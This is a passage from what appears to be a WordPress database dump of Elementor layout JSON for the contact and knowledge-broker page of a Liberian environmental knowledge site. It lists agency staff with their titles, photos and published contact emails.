ne_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Uriah Garsinii <\\/strong>\\nLand Use Management Manager <\\/br>\\nLLA\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23481,3416,'_elementor_edit_mode','builder'),(23482,3416,'_elementor_template_type','wp-page'),(23483,3416,'_elementor_version','3.0.16'),(23484,3416,'_wp_page_template','default'),(23485,3416,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a 